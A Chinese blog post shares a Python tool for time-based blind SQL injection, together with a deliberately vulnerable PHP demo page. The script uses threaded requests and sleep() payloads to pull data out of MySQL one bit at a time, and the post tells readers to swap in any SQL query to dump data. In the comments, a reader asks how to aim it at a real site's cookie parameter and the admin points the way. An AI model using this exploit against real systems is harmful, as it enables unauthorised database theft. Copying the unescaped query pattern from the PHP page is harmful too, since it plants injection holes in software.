python利用二进制延迟注入demo

看了freebuf的mysql延迟注入课程,感觉他那个突破延迟注入时间限制的思路非常不错

课程地址:http://yuntv.letv.com/bcloud.html?uu=cbb16903e4&vu=f69b1ac857&width=1024&height=576

然后自己写了个py的demo,代码写的渣勿笑~

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Sunshie
# @Last Modified time: 2015-08-30 01:48:41
# blog:https://phpinfo.me
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
    """Worker thread that probes a single bit of a single character.

    Each instance sends exactly one request. The injected condition makes the
    server ``sleep(2)`` when the selected binary digit of the selected
    character of ``(select user())`` is 1; ``request()`` reports that as the
    literal ``'timeout'``. The outcome is stored in the module-level ``res``
    dict under the key ``str(bit)``: 1 when the request timed out, 0 otherwise.

    Note: the first constructor parameter is named ``str`` in the original API
    and shadows the builtin inside ``__init__``; the name is kept so callers
    are unaffected. No lock guards the concurrent writes to ``res``.
    """

    def __init__(self, str, x):
        # ``str`` is the 1-based binary-digit index (1..8); ``x`` the 1-based
        # character position within the extracted value.
        threading.Thread.__init__(self)
        self.str = str
        self.x = x

    def run(self):
        global res
        pos = self.x
        bit = self.str
        # URL-encoded payload: ord() of the pos-th character, zero-padded to 8
        # binary digits; the bit-th digit gates a sleep(2).
        url = ("http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29,"
               + str(pos) + ",1%29%29%29,8,0%29," + str(bit) + ",1%29%29,sleep%282%29,0%29%23")
        body = request(url)
        # request() yields the literal 'timeout' when the 2 s client timeout fires.
        res[str(bit)] = 1 if 'timeout' in body else 0
	

def request(URL):
    """Fetch *URL* with a fixed desktop User-Agent and a 2 s timeout.

    Returns the response body on success. Any exception raised while opening
    the URL (timeout, connection failure, HTTP error, ...) is collapsed into
    the literal string ``'timeout'``, after an additional 2 s sleep whose
    purpose is not stated on the page. Callers interpret ``'timeout'`` as
    "the injected sleep() fired", so every other failure mode is read as a
    set bit as well.

    Detection note: the hard-coded User-Agent and the ``sleep(`` token in the
    query string are both distinctive in web-server access logs.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, headers)
    try:
        resp = urllib2.urlopen(req, timeout=2)
    except Exception:
        # Broad catch kept as in the original: every failure becomes 'timeout'.
        time.sleep(2)
        return 'timeout'
    return resp.read()

def curl(url):
    """Issue a GET to *url* via ``requests`` and return ``int(time.clock())``.

    NOTE(review): the value returned is the clock reading taken *after* the
    request, not ``end - start`` -- ``start`` is captured but never used, so
    this does not measure elapsed time. ``time.clock()`` is platform-dependent
    (processor time on Unix) and was removed in Python 3.8. This helper is not
    called anywhere in this file.

    On ``requests.RequestException`` an error message is printed and the
    process exits.
    """
    try:
        start = time.clock()  # captured but never used
        requests.get(url)
        end = time.clock()
    except requests.RequestException:
        print(u"访问出错!")
        exit()
    return int(end)
def getLength():
    """Determine the length of ``(select user())`` by time-based probing.

    One request is sent per candidate length, starting at 0. The injected
    condition makes the server ``sleep(1)`` when ``length(...)`` equals the
    candidate, which ``request()`` reports as ``'timeout'``. Progress and the
    detected length are printed; the length is returned.

    NOTE(review): there is no upper bound -- if no candidate ever produces a
    timeout the loop does not terminate.
    """
    candidate = 0
    marker = 'timeout'
    while True:
        print("[+] Checking: %s \r" % candidate)
        url = ("http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="
               + str(candidate) + ",1,0))%23")
        if marker in request(url):
            print(u"[+] 数据长度为: %s" % candidate)
            return candidate
        candidate += 1
def bin2dec(string_num):
    """Parse a string of binary digits (e.g. ``"01100001"``) into an int."""
    return int(string_num, base=2)

def getData(dataLength):
    """Recover *dataLength* characters of ``(select user())`` one bit at a time.

    For each 1-based character position, eight ``my_threading`` workers (one
    per binary digit 1..8) run concurrently and write 0/1 into the shared
    module-level ``res`` dict under the keys ``'1'``..``'8'``. The digits are
    concatenated in key order, parsed with ``bin2dec`` and turned into a
    character with ``chr``; each character is printed as it is recovered and
    appended to the result, which is printed at the end. ``res`` is reset to
    an empty dict after every character.

    Nothing is returned -- the recovered string is only printed. The workers
    are daemon threads and are joined before the bits are read, so the only
    synchronisation on ``res`` is that join.
    """
    global res
    recovered = ""
    for pos in range(1, dataLength + 1):
        workers = [my_threading(bit, pos) for bit in range(1, 9)]
        for worker in workers:
            worker.setDaemon(True)
            worker.start()
        for worker in workers:
            worker.join()
        # Read the eight digits back in key order '1'..'8'.
        bits = "".join(str(res[str(bit)]) for bit in range(1, 9))
        res = {}
        char = chr(bin2dec(bits))
        print(char)
        recovered += char
    print("[+] ok!")
    print("[+] result:" + recovered)


if __name__ == '__main__':
    # Entry point: find the value's length, then extract it character by character.
    stop = False  # bound here but never read anywhere in this file
    res = {}      # shared result dict written by the my_threading workers
    length = getLength()
    getData(length)

1.php代码如下:

<?php
/* 
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Sunshie
* @Last Modified time: 2015-08-30 01:46:17
* Time-delay injection test (deliberately vulnerable demo target)
*
* Review notes:
*  - The query below interpolates $_GET['username'] directly into SQL with no
*    escaping or parameter binding; that is the sink the Python script drives.
*    The fix is a prepared statement with a bound parameter (mysqli or PDO).
*    The mysql_* extension used here was removed in PHP 7.
*  - The script connects as root with an empty password to the `mysql` system
*    schema. An application-specific account holding only the grants the page
*    needs would limit what any injected query can reach.
*/
header("Content-type:text/html;charset=utf8");
// Root account, empty password, `mysql` system schema selected as the database.
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
// Untrusted request parameter concatenated into the query: the injection sink.
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
// The raw query text, including the attacker-controlled value, is echoed back,
// so this response is not truly blind; the page's time-based technique does not
// depend on it.
echo $sql;
// Return value is never checked and the result set is never rendered.
$query = mysql_query($sql);
echo "这是一个没有任何回显的注入点";

?>

py

如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可

  1. 2015/08/31
    jzking121

    谢谢博主,非常好用,已转载,并附上原文链接!

  2. 2015/09/03
    ki11

    不错啊。顺便问下,影牛,博主主题自己写的还是网上的,告知下~谢谢

    • admin
      2015/09/06
      admin
      @ki11 网上的
  3. 2015/09/14
    小白

    很好用,速度快了很多. 遇到一个站,cookie里有一个参数有延迟注入,请问博主你这个脚本需要修改哪些地方?

    • admin
      2015/09/15
      admin
      @小白 百度 urllib2带cookie请求